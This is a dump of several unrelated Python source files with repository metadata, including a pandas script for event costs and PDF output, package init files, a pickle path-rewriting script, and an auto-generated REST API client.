df_productos.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_productos['BeneficioBruto'].sum())
df_productos.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_productos['BeneficioNeto'].sum())
# Compute totals for Bebidas
df_bebidas.at['Total Coste', 'Coste'] = str(df_bebidas['Coste'].sum())
df_bebidas.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_bebidas['BeneficioBruto'].sum())
df_bebidas.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_bebidas['BeneficioNeto'].sum())
# Compute totals for Materiales
df_materiales.at['Total Coste', 'Coste'] = str(df_materiales['Coste'].sum())
df_materiales.at['Total Beneficio Bruto', 'BeneficioBruto'] = str(df_materiales['BeneficioBruto'].sum())
df_materiales.at['Total Beneficio Neto', 'BeneficioNeto'] = str(df_materiales['BeneficioNeto'].sum())
# Compute totals for Trabajadores
df_trabajadores.at['Total Coste', 'Coste'] = str(df_trabajadores['Coste'].sum())
# Write dataframe to excel file
writer = pd.ExcelWriter('output.xlsx')
df_principal.to_excel (excel_writer=writer, sheet_name=str_tituloEvento)
df_productos.to_excel (excel_writer=writer, sheet_name='Productos')
df_bebidas.to_excel (excel_writer=writer, sheet_name='Bebidas')
df_materiales.to_excel (excel_writer=writer, sheet_name='Materiales')
df_trabajadores.to_excel(excel_writer=writer, sheet_name='Trabajadores')
writer.save()
# Templating
this_dir, this_filename = os.path.split(__file__)
env = Environment(loader=FileSystemLoader(searchpath=this_dir+'/templates/'))
template = env.get_template('template_evento.html')
template_vars = {
"Evento": str_tituloEvento,
"Titulo": "Beneficio del Evento: " + str_tituloEvento,
"Productos": df_productos.to_html (na_rep="", justify='center'),
"Bebidas": df_bebidas.to_html (na_rep="", justify='center'),
"Materiales": df_materiales.to_html (na_rep="", justify='center'),
"Trabajadores": df_trabajadores.to_html (na_rep="", justify='center')
}
html_out = template.render(template_vars)
# Print PDF
printPDF(html_out, 'evento.pdf')
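# This module defines functions only; a minimal, hedged entry-point sketch
# (function names taken from the API comment above, output file names from the
# printPDF calls in this file):
if __name__ == "__main__":
    # Each function reads its fixed Excel input (receta.xlsx / menu.xlsx /
    # evento.xlsx), rewrites output.xlsx, and renders a PDF via pdfkit.
    printListaCompraReceta()   # -> receta.pdf (shopping list for the recipe)
    printBeneficioEvento()     # -> evento.pdf (profit summary for the event)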
avg_line_length: 35.950437 | max_line_length: 107 | alphanum_fraction: 0.751602 | qsc_code_num_words: 1,616 | qsc_code_num_chars: 12,331 | … remaining qsc_* quality-signal values
hexsha: cd56976c3b6c694cb9f59ae3236fa5e334b8ac80 | size: 409 | ext: py | lang: Python
path: syft/serde/msgpack/__init__.py | repo: NicoSerranoP/PySyft @ 87fcd566c46fce4c16d363c94396dd26bd82a016 | licenses: ["Apache-2.0"]
stars: 7 (2020-04-20T22:22:08.000Z .. 2020-07-25T17:32:08.000Z) | issues: 3 (2020-04-24T21:20:57.000Z .. 2020-05-28T09:17:02.000Z) | forks: 4 (2020-04-24T22:32:37.000Z .. 2020-05-25T19:29:20.000Z)
from syft.serde.msgpack import serde # noqa: F401
from syft.serde.msgpack import native_serde # noqa: F401
from syft.serde.msgpack import torch_serde # noqa: F401
from syft.serde.msgpack import proto # noqa: F401
from syft.serde.msgpack.proto import proto_type_info # noqa: F401
from syft.serde.msgpack.serde import serialize # noqa: F401
from syft.serde.msgpack.serde import deserialize # noqa: F401
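# The imports above re-export the msgpack serde surface at package level (the
# '# noqa: F401' markers silence unused-import warnings). A hedged usage
# sketch, assuming an environment where this PySyft build is installed:
#
#   from syft.serde.msgpack import serialize, deserialize
#   blob = serialize(obj)        # msgpack-encode a supported object
#   obj2 = deserialize(blob)     # decode it back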
avg_line_length: 45.444444 | max_line_length: 66 | alphanum_fraction: 0.784841 | qsc_code_num_words: 63 | qsc_code_num_chars: 409 | … remaining qsc_* quality-signal values
hexsha: cd7e1afa5a3d6137b5f93d88d441e454a193a15c | size: 1,217 | ext: py | lang: Python
path: pointpillars_with_TANet/second/toy_example/pickle_change.py | repo: mjseong0414/TANet @ 830baa699c990f3f52baa062ab7b196825bf128e | licenses: ["MIT"] | stars/issues/forks counts: null
import pickle
import sys
sys.path.append("/home/minjae/TANet/pointpillars_with_TANet/second/data/")
f = open("/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/JRDB_to_kitti_infos_val.pkl", 'rb')
data = pickle.load(f)
# import pdb; pdb.set_trace()  # debugging breakpoint disabled so the script can run unattended
# f = open("/home/joon/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/JRDB_to_kitti_infos_val_origin.pkl", 'rb')
# data = pickle.load(f)
# import pdb; pdb.set_trace()
for i in range(len(data)):
before_str = data[i]['velodyne_path']
after_str = before_str.replace('/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/', '')
data[i]['velodyne_path'] = '/home/spalab/jrdb_3dteam/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/' + after_str
#import pdb; pdb.set_trace()
before_str = data[i]['img_path']
after_str = before_str.replace('/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/', '')
data[i]['img_path'] = '/home/spalab/jrdb_3dteam/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/' + after_str
with open('/home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/JRDB_val.pkl', 'wb') as f:
pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
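# Worked example of the rewrite performed in the loop above (prefixes taken
# from the replace() calls; 'velodyne/000000.bin' is illustrative, not from
# this file):
#   before: /home/minjae/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/velodyne/000000.bin
#   after:  /home/spalab/jrdb_3dteam/TANet/pointpillars_with_TANet/second/data/JRDB_to_KITTI/velodyne/000000.bin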
avg_line_length: 48.68 | max_line_length: 126 | alphanum_fraction: 0.760887 | qsc_code_num_words: 193 | qsc_code_num_chars: 1,217 | … remaining qsc_* quality-signal values
hexsha: cd85de0168482227fb215bef0d0d59a6198a7e71 | size: 47 | ext: py | lang: Python
path: txamqpr/__init__.py | repo: aliowka/txamqpr @ c96082fa6807ea0945a273f7c7d355bb4cf709ec | licenses: ["Apache-2.0"] | stars/issues/forks counts: null
from .txamqpr import txAMQPReconnectingFactory
avg_line_length: 23.5 | max_line_length: 46 | alphanum_fraction: 0.893617 | qsc_code_num_words: 4 | qsc_code_num_chars: 47 | … remaining qsc_* quality-signal values
hexsha: f87fa17534f7e029aa3bfe1bf46d5a2cc17fbc9f | size: 111 | ext: py | lang: Python
path: dist/micropy-cli/frozen/uasyncio/__init__.py | repo: kevindawson/Pico-Stub @ 6f9112779d4d81f821a3af273a450b9329ccdbab | licenses: ["Apache-2.0"]
stars: 19 (2021-01-25T23:56:09.000Z .. 2022-02-21T13:55:16.000Z) | issues: 18 (2021-02-06T09:03:09.000Z .. 2021-10-04T16:36:35.000Z) | forks: 6 (2021-01-26T08:41:47.000Z .. 2021-04-27T11:33:33.000Z)
from typing import Any
def __getattr__(attr: Any) -> Any: ...
# 0: return value
# ? 0: return value
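# The catch-all above is the PEP 562 module-level __getattr__ hook; in a stub
# file it tells a type checker that any attribute of this module may exist and
# types as Any. A hedged illustration (module name from this stub's path):
#
#   import uasyncio
#   uasyncio.sleep_ms   # accepted by a checker reading this stub, typed as Any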
avg_line_length: 18.5 | max_line_length: 38 | alphanum_fraction: 0.603604 | qsc_code_num_words: 15 | qsc_code_num_chars: 111 | … remaining qsc_* quality-signal values
hexsha: f89d2cc66bb344f5ec290dbfab754a9911bd1f89 | size: 59,714 | ext: py | lang: Python
path: sel_dedicated_codegen/api/miscellaneous_api.py | repo: xRocketPowerx/python-sel-dedicated @ 3b9b41fbd7abc05d427e8abf688b007b6dcf9e96 | licenses: ["MIT"]
stars: 2 (2019-10-12T08:56:31.000Z .. 2019-10-12T17:34:51.000Z) | issues: null | forks: null
# coding: utf-8
"""
Seido User REST API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.4.8
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from sel_dedicated_codegen.api_client import ApiClient
from sel_dedicated_codegen.exceptions import (
ApiTypeError,
ApiValueError
)
class MiscellaneousApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_user_name_update_view(self, uuid, **kwargs): # noqa: E501
"""Delete user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_name_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseBaseModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_user_name_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def delete_user_name_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Delete user name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_name_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseBaseModel, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `delete_user_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/user-name-service/name/{uuid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseBaseModel', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_name_tags_view(self, uuid, **kwargs): # noqa: E501
"""Get list of name's tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_tags_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameTagsListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_name_tags_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_name_tags_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get list of name's tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_tags_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameTagsListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_name_tags_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_name_tags_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/name/{uuid}/tag', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameTagsListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_name_update_view(self, uuid, **kwargs): # noqa: E501
"""Get name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_name_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_name_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get name data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_name_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_name_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/name/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_name_view(self, **kwargs): # noqa: E501
"""Get name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param list[str] tags: tags
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameListModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_name_view_with_http_info(**kwargs) # noqa: E501
def get_name_view_with_http_info(self, **kwargs): # noqa: E501
"""Get name list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_name_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param list[str] tags: tags
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameListModel, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['tags', 'limit', 'page', 'sort', 'order'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tags' in local_var_params:
query_params.append(('tags', local_var_params['tags'])) # noqa: E501
collection_formats['tags'] = 'multi' # noqa: E501
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'order' in local_var_params:
query_params.append(('order', local_var_params['order'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/name', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameListModel', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
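# Hedged usage sketch for this generated client (constructing MiscellaneousApi
# with a default ApiClient, per __init__ above; host configuration is assumed):
#
#   from sel_dedicated_codegen.api.miscellaneous_api import MiscellaneousApi
#   api = MiscellaneousApi()
#   result = api.get_name_view(limit=10, page=1)   # -> ResponseNameListModel
#   thread = api.get_name_view(async_req=True)     # async variant
#   result = thread.get()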
def get_random_name_view(self, **kwargs): # noqa: E501
"""Get random name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_name_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool get_user_name: flag: need to return one of user's name
:param list[str] tags: tags
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseNameResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_random_name_view_with_http_info(**kwargs) # noqa: E501
def get_random_name_view_with_http_info(self, **kwargs): # noqa: E501
"""Get random name # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_name_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param bool get_user_name: flag: need to return one of user's name
:param list[str] tags: tags
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseNameResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['get_user_name', 'tags'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_random_name_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'get_user_name' in local_var_params:
query_params.append(('get_user_name', local_var_params['get_user_name'])) # noqa: E501
if 'tags' in local_var_params:
query_params.append(('tags', local_var_params['tags'])) # noqa: E501
collection_formats['tags'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/random', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseNameResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag_names_view(self, uuid, **kwargs): # noqa: E501
"""Get list of tag's names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_names_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseTagNamesListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_names_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_tag_names_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get list of tag's names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_names_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseTagNamesListResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag_names_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_tag_names_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/tag/{uuid}/name', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseTagNamesListResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag_update_view(self, uuid, **kwargs): # noqa: E501
"""Get tag data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_update_view(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseTagResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_update_view_with_http_info(uuid, **kwargs) # noqa: E501
def get_tag_update_view_with_http_info(self, uuid, **kwargs): # noqa: E501
"""Get tag data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_update_view_with_http_info(uuid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str uuid: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ResponseTagResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tag_update_view" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'uuid' is set
if ('uuid' not in local_var_params or
local_var_params['uuid'] is None):
raise ApiValueError("Missing the required parameter `uuid` when calling `get_tag_update_view`") # noqa: E501
collection_formats = {}
path_params = {}
if 'uuid' in local_var_params:
path_params['uuid'] = local_var_params['uuid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/misc/name-service/tag/{uuid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseTagResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tag_view(self, **kwargs): # noqa: E501
"""Get tag list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_view(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ResponseTagListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tag_view_with_http_info(**kwargs) # noqa: E501
def get_tag_view_with_http_info(self, **kwargs): # noqa: E501
"""Get tag list # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tag_view_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int limit:
:param int page:
:param str sort:
:param str order: Order direction: [\"desc\", \"asc\"]
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
